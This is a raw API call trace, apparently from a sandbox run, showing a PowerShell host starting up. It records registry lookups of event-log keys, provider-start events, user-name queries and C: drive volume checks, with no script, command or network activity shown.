	[0820.540] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0820.540] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x6, lpName=0x25aca0, lpcchName=0x16d5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0820.540] CoTaskMemFree (pv=0x25aca0) 
	[0820.540] CoTaskMemFree (pv=0x0) 
	[0820.540] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0820.540] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x7, lpName=0x25aca0, lpcchName=0x16d5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0820.540] CoTaskMemFree (pv=0x25aca0) 
	[0820.540] CoTaskMemFree (pv=0x0) 
	[0820.541] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0820.541] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x8, lpName=0x25aca0, lpcchName=0x16d5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0820.541] CoTaskMemFree (pv=0x25aca0) 
	[0820.541] CoTaskMemFree (pv=0x0) 
	[0820.541] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x35c) returned 0x0
	[0820.541] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x0) returned 0x2
	[0820.541] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x380) returned 0x0
	[0820.541] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x0) returned 0x2
	[0820.541] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x384) returned 0x0
	[0820.541] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x0) returned 0x2
	[0820.542] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x388) returned 0x0
	[0820.542] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x0) returned 0x2
	[0820.542] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x38c) returned 0x0
	[0820.542] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x0) returned 0x2
	[0820.542] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x390) returned 0x0
	[0820.542] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x0) returned 0x2
	[0820.542] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x394) returned 0x0
	[0820.542] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x0) returned 0x2
	[0820.542] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x398) returned 0x0
	[0820.543] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x0) returned 0x2
	[0820.543] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x39c) returned 0x0
	[0820.543] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x3a0) returned 0x0
	[0820.543] RegCloseKey (hKey=0x3a0) returned 0x0
	[0820.543] RegCloseKey (hKey=0x37c) returned 0x0
	[0820.544] RegCloseKey (hKey=0x39c) returned 0x0
	[0820.551] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b820008
	[0824.950] ReportEventW (hEventLog=0x1b820008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3419300*="WSMan", lpRawData=0x3419070) returned 1
	[0824.963] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0824.963] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0824.964] CoTaskMemFree (pv=0x2b4b30) 
	[0824.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0824.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0824.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0824.966] CoTaskMemAlloc (cb=0x804) returned 0x1b754fa0
	[0824.966] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b754fa0, nSize=0x16d8a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8a8) returned 0x1
	[0824.966] CoTaskMemFree (pv=0x1b754fa0) 
	[0824.966] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0824.967] GetUserNameW (in: lpBuffer=0x25aca0, pcbBuffer=0x16d8e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8e8) returned 1
	[0824.967] CoTaskMemFree (pv=0x25aca0) 
	[0824.967] ReportEventW (hEventLog=0x1b820008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x341e838*="Alias", lpRawData=0x341e5c8) returned 1
	[0824.974] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0824.974] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0824.974] CoTaskMemFree (pv=0x2b4b30) 
	[0824.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0824.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0824.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0824.976] CoTaskMemAlloc (cb=0x804) returned 0x1b754fa0
	[0824.976] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b754fa0, nSize=0x16d8a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8a8) returned 0x1
	[0824.977] CoTaskMemFree (pv=0x1b754fa0) 
	[0824.977] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0824.977] GetUserNameW (in: lpBuffer=0x25aca0, pcbBuffer=0x16d8e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8e8) returned 1
	[0824.977] CoTaskMemFree (pv=0x25aca0) 
	[0824.978] ReportEventW (hEventLog=0x1b820008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3423e30*="Environment", lpRawData=0x3423bc0) returned 1
	[0824.994] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0824.994] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0824.994] CoTaskMemFree (pv=0x2b4b30) 
	[0824.995] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0824.995] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0824.996] CoTaskMemFree (pv=0x2b4b30) 
	[0824.996] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0824.996] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0824.996] CoTaskMemFree (pv=0x2b4b30) 
	[0824.996] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x16d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0824.996] SetErrorMode (uMode=0x1) returned 0x1
	[0824.996] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x16d660 | out: lpFileInformation=0x16d660*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0824.997] SetErrorMode (uMode=0x1) returned 0x1
	[0824.998] GetLogicalDrives () returned 0x4
	[0824.998] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0825.000] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0825.000] SetErrorMode (uMode=0x1) returned 0x1
	[0825.001] CoTaskMemAlloc (cb=0x68) returned 0x2b7670
	[0825.001] CoTaskMemAlloc (cb=0x68) returned 0x1b73e110
	[0825.001] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b7670, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x16d630, lpMaximumComponentLength=0x16d62c, lpFileSystemFlags=0x16d628, lpFileSystemNameBuffer=0x1b73e110, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16d630*=0x9c354b42, lpMaximumComponentLength=0x16d62c*=0xff, lpFileSystemFlags=0x16d628*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0825.001] CoTaskMemFree (pv=0x2b7670) 
	[0825.001] CoTaskMemFree (pv=0x1b73e110) 
	[0825.001] SetErrorMode (uMode=0x1) returned 0x1
	[0825.001] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0825.003] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d370, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0825.003] SetErrorMode (uMode=0x1) returned 0x1
	[0825.003] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d5d0 | out: lpFileInformation=0x16d5d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0825.003] SetErrorMode (uMode=0x1) returned 0x1
	[0825.003] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d370, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0825.003] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d220, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0825.003] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0825.004] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0825.004] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0825.005] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0825.005] SetErrorMode (uMode=0x1) returned 0x1
	[0825.005] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d400 | out: lpFileInformation=0x16d400*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0825.005] SetErrorMode (uMode=0x1) returned 0x1
	[0825.005] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0825.005] SetErrorMode (uMode=0x1) returned 0x1
	[0825.006] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d400 | out: lpFileInformation=0x16d400*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0825.006] SetErrorMode (uMode=0x1) returned 0x1
	[0825.006] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d240, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0825.006] SetErrorMode (uMode=0x1) returned 0x1
	[0825.006] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d4a0 | out: lpFileInformation=0x16d4a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0825.006] SetErrorMode (uMode=0x1) returned 0x1
	[0825.007] CoTaskMemAlloc (cb=0x804) returned 0x1b754fa0
	[0825.007] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b754fa0, nSize=0x16d8a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8a8) returned 0x1
	[0825.007] CoTaskMemFree (pv=0x1b754fa0) 
	[0825.007] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0825.007] GetUserNameW (in: lpBuffer=0x25aca0, pcbBuffer=0x16d8e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8e8) returned 1
	[0825.008] CoTaskMemFree (pv=0x25aca0) 
	[0825.008] ReportEventW (hEventLog=0x1b820008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x342af20*="FileSystem", lpRawData=0x342acb0) returned 1
	[0828.068] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0828.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0828.068] CoTaskMemFree (pv=0x2b4b30) 
	[0828.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0828.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0828.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0828.070] CoTaskMemAlloc (cb=0x804) returned 0x1b754fa0
	[0828.070] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b754fa0, nSize=0x16d8a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8a8) returned 0x1
	[0828.071] CoTaskMemFree (pv=0x1b754fa0) 
	[0828.071] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0828.071] GetUserNameW (in: lpBuffer=0x25aca0, pcbBuffer=0x16d8e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8e8) returned 1
	[0828.071] CoTaskMemFree (pv=0x25aca0) 
	[0828.071] ReportEventW (hEventLog=0x1b820008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3430760*="Function", lpRawData=0x34304f0) returned 1
	[0828.164] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0828.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0828.165] CoTaskMemFree (pv=0x2b4b30) 
	[0828.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0828.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0828.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0828.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0828.198] CoTaskMemAlloc (cb=0x804) returned 0x1b754fa0
	[0828.198] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b754fa0, nSize=0x16d8a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8a8) returned 0x1
	[0831.095] CoTaskMemFree (pv=0x1b754fa0) 
	[0831.095] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0831.095] GetUserNameW (in: lpBuffer=0x25aca0, pcbBuffer=0x16d8e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8e8) returned 1
	[0831.096] CoTaskMemFree (pv=0x25aca0) 
	[0831.096] ReportEventW (hEventLog=0x1b820008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3452f88*="Registry", lpRawData=0x3452d18) returned 1
	[0831.675] CoTaskMemAlloc (cb=0x804) returned 0x1b754fa0
	[0831.675] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b754fa0, nSize=0x16d8a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8a8) returned 0x1
	[0831.675] CoTaskMemFree (pv=0x1b754fa0) 
	[0831.675] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0831.675] GetUserNameW (in: lpBuffer=0x25aca0, pcbBuffer=0x16d8e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8e8) returned 1
	[0831.676] CoTaskMemFree (pv=0x25aca0) 
	[0831.676] ReportEventW (hEventLog=0x1b820008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34583a0*="Variable", lpRawData=0x3458130) returned 1
	[0831.678] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0831.678] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0831.678] CoTaskMemFree (pv=0x2b4b30) 
	[0831.682] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0831.682] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0831.682] CoTaskMemFree (pv=0x2b4b30) 
	[0831.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0831.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0831.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0831.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0843.655] CoTaskMemAlloc (cb=0x804) returned 0x1b754fa0
	[0843.655] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b754fa0, nSize=0x16d8a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8a8) returned 0x1
	[0843.656] CoTaskMemFree (pv=0x1b754fa0) 
	[0843.656] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0843.656] GetUserNameW (in: lpBuffer=0x25aca0, pcbBuffer=0x16d8e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8e8) returned 1
	[0843.656] CoTaskMemFree (pv=0x25aca0) 
	[0843.657] ReportEventW (hEventLog=0x1b820008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x346bfb8*="Certificate", lpRawData=0x346bd48) returned 1
	[0844.654] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0844.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0844.654] CoTaskMemFree (pv=0x2b4b30) 
	[0844.658] GetLogicalDrives () returned 0x4
